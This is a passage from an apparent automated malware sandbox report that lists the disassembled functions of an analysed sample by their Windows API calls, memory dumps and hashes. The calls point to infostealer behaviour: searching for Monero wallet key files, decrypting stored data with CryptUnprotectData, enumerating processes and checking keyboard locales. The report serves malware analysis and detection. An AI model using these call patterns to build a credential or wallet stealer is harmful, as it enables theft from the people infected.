                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                        • String ID: \*.*
                                        • API String ID: 2325840235-1173974218
                                        • Opcode ID: 1d2d8eb7c226b733929eaad533dc2d6004556c1f2096ae5bd0b1aec588153734
                                        • Instruction ID: 29dc596a114e9e2bec6e5b0eaf7ea6a4db9a32eda9bd1c06778f734d74fecc11
                                        • Opcode Fuzzy Hash: 1d2d8eb7c226b733929eaad533dc2d6004556c1f2096ae5bd0b1aec588153734
                                        • Instruction Fuzzy Hash: 01F1A371814118AADB25FB61DCA5EEE733CBF54300F8041E9B45A62491EF316F4ADF61
                                        Function 00CADA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CC14B0,00CC0C2A), ref: 00CADAEB
                                        • StrCmpCA.SHLWAPI(?,00CC14B4), ref: 00CADB33
                                        • StrCmpCA.SHLWAPI(?,00CC14B8), ref: 00CADB49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CADDCC
                                        • FindClose.KERNEL32(000000FF), ref: 00CADDDE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
                                        • Opcode ID: 3dac70f8072790d8363dbe3b7611d2ca8ad972dc008ad937f6e7b6bd72745630
                                        • Instruction ID: fab5cf51aced5a615871ff8d0040897fad3f46c784fffeb5f650c1b0e0e7e70d
                                        • Opcode Fuzzy Hash: 3dac70f8072790d8363dbe3b7611d2ca8ad972dc008ad937f6e7b6bd72745630
                                        • Instruction Fuzzy Hash: D7915972900108ABCB14FFB1DC96DED737DAB85304F408568F85BA6581EE34AB0DDB92
                                        Function 00CB7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        • GetKeyboardLayoutList.USER32(00000000,00000000,00CC05AF), ref: 00CB7BE1
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00CB7BF9
                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00CB7C0D
                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00CB7C62
                                        • LocalFree.KERNEL32(00000000), ref: 00CB7D22
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                        • String ID: /
                                        • API String ID: 3090951853-4001269591
                                        • Opcode ID: e61ebf20086cdaff7e9edcecc324e0b714422e3ca5c724b752b2f10259a98d0d
                                        • Instruction ID: 67de82b50dbe05b3197290d503345d18929bb5cd3cd5826d0ff38a21e2185317
                                        • Opcode Fuzzy Hash: e61ebf20086cdaff7e9edcecc324e0b714422e3ca5c724b752b2f10259a98d0d
                                        • Instruction Fuzzy Hash: 39415C71940218ABDB24DB95DC99BEEB778FF44700F204299E40A76281DB342F89DFA1
                                        Function 00CAE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                          • Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
                                          • Part of subcall function 00CBA920: lstrcat.KERNEL32(00000000), ref: 00CBA982
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00CC0D73), ref: 00CAE4A2
                                        • StrCmpCA.SHLWAPI(?,00CC14F8), ref: 00CAE4F2
                                        • StrCmpCA.SHLWAPI(?,00CC14FC), ref: 00CAE508
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00CAEBDF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 433455689-1173974218
                                        • Opcode ID: 7ee21fefeefaed825ae5ba1ddd86946d64fd4e12b6f2e4775274ab51ef4d4879
                                        • Instruction ID: 090f8cb592b3462fcad44991c51bf2d619e923655634711379ea224d26d90dcf
                                        • Opcode Fuzzy Hash: 7ee21fefeefaed825ae5ba1ddd86946d64fd4e12b6f2e4775274ab51ef4d4879
                                        • Instruction Fuzzy Hash: 80123171910118AADB24FB61DCA6EED733CAF54300F4045A9B54AA64D1EF306F49EFA2
                                        Function 01070AD7 Relevance: 8.6, Strings: 6, Instructions: 1059COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: %iv~$@wX$Qlx_$Tqo$XeNm$XeNm
                                        • API String ID: 0-4062974250
                                        • Opcode ID: 74e6cfc0dd3644992bebae6c8952f48eaa4b442d404c3a01adc22757b76e8969
                                        • Instruction ID: de4a28d5cb9ea832b2e8ea9c026d48bf77a8c938253e11a4369eee1d8c3a60f6
                                        • Opcode Fuzzy Hash: 74e6cfc0dd3644992bebae6c8952f48eaa4b442d404c3a01adc22757b76e8969
                                        • Instruction Fuzzy Hash: F762F6F3A0C200AFE704AE29DC4577AB7E9EF94320F16893DEAC5C7744EA3558058796
                                        Function 00CAC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00CAC871
                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00CAC87C
                                        • lstrcat.KERNEL32(?,00CC0B46), ref: 00CAC943
                                        • lstrcat.KERNEL32(?,00CC0B47), ref: 00CAC957
                                        • lstrcat.KERNEL32(?,00CC0B4E), ref: 00CAC978
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$BinaryCryptStringlstrlen
                                        • String ID:
                                        • API String ID: 189259977-0
                                        • Opcode ID: 94109f0010dca7fe5e7c65a889b23509ccd4691542ab08b666706da2fd782bb4
                                        • Instruction ID: 5d71e8fa6585fb4f30bc3a2b21eca5cc939f57514dc67243369afe8d2b5b409a
                                        • Opcode Fuzzy Hash: 94109f0010dca7fe5e7c65a889b23509ccd4691542ab08b666706da2fd782bb4
                                        • Instruction Fuzzy Hash: 45414CB590421EDFCB10DFA4DD89BFEB7B8AB48304F1441B8F509A6280D7706A84CF91
                                        Function 00CA7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00CA724D
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00CA7254
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00CA7281
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00CA72A4
                                        • LocalFree.KERNEL32(?), ref: 00CA72AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                        • String ID:
                                        • API String ID: 2609814428-0
                                        • Opcode ID: 217c047589e5f3ccfc7eb41e3127d76118a898a5077706d4f727e9fe498fe696
                                        • Instruction ID: 17c83a638261e0f7bf700e871656a8bf0c05130b4e4cd9c76a84a8d1aad1dfa3
                                        • Opcode Fuzzy Hash: 217c047589e5f3ccfc7eb41e3127d76118a898a5077706d4f727e9fe498fe696
                                        • Instruction Fuzzy Hash: 170100B5A40208BFDB14DBD5DD89F9D7778AB44704F144159FB05BA2C0D670BA048B65
                                        Function 00CB9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CB961E
                                        • Process32First.KERNEL32(00CC0ACA,00000128), ref: 00CB9632
                                        • Process32Next.KERNEL32(00CC0ACA,00000128), ref: 00CB9647
                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 00CB965C
                                        • CloseHandle.KERNEL32(00CC0ACA), ref: 00CB967A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: 2fa818a18ce16a2a9aacfe1a3534b902bc0f180a8249f438d0da754b5d3dca1a
                                        • Instruction ID: ac05492856b6b59101cf4d8d4dbd1ff6c83d751632f29e534a016e3ab6f4e949
                                        • Opcode Fuzzy Hash: 2fa818a18ce16a2a9aacfe1a3534b902bc0f180a8249f438d0da754b5d3dca1a
                                        • Instruction Fuzzy Hash: E6010CB5A00208AFDB54DFA6CD88BEDBBF9EB58300F144199B909A6240D774AB44CF51
                                        Function 0106CDA5 Relevance: 6.6, Strings: 4, Instructions: 1642COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 7R`E$`p-w$<g$Kz
                                        • API String ID: 0-4293365461
                                        • Opcode ID: 0169029f6acc286b84df44d9c15a167e26a9bb4298e0789c780bbd8e88a0952b
                                        • Instruction ID: 071da8644f436fe7a631e663cae20c18ec52054887e051d8858cd2cb45afeb00
                                        • Opcode Fuzzy Hash: 0169029f6acc286b84df44d9c15a167e26a9bb4298e0789c780bbd8e88a0952b
                                        • Instruction Fuzzy Hash: EFB2F6F350C2049FE304AF29EC8567AFBE9EFD4720F1A892DE6C483744EA3558458697
                                        Function 0106E96D Relevance: 6.5, Strings: 4, Instructions: 1547COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367662136.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367522794.0000000000EEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001188000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367662136.00000000011A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367879755.00000000011A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367979504.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1367994970.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ca0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: `r}$b[}$o>u$pLH
                                        • API String ID: 0-3566674915
                                        • Opcode ID: ad9a971b24cc8aaea1c3ab85cd77a12af4eea2067e503cf891875f356f847f91
                                        • Instruction ID: 49b0535e4f39b8ac77dff6bc2b46f46d7f0e581d09cd33cc01ba0a7cb3d6aeb4
                                        • Opcode Fuzzy Hash: ad9a971b24cc8aaea1c3ab85cd77a12af4eea2067e503cf891875f356f847f91
                                        • Instruction Fuzzy Hash: 0AB2E3F360C2049FE7046E29EC8567AFBE9EF94320F1A493DEAC583344EA3558058797
                                        Function 00CB8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0E17,00000000), ref: 00CBA788
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00CC05B7), ref: 00CB86CA
                                        • Process32First.KERNEL32(?,00000128), ref: 00CB86DE
                                        • Process32Next.KERNEL32(?,00000128), ref: 00CB86F3
                                          • Part of subcall function 00CBA9B0: lstrlen.KERNEL32(?,009D89A8,?,\Monero\wallet.keys,00CC0E17), ref: 00CBA9C5
                                          • Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
                                          • Part of subcall function 00CBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CBAA12
                                          • Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0E17), ref: 00CBA905
                                        • CloseHandle.KERNEL32(?), ref: 00CB8761
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                        • Associated: 00000000.00000002.1367509302.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
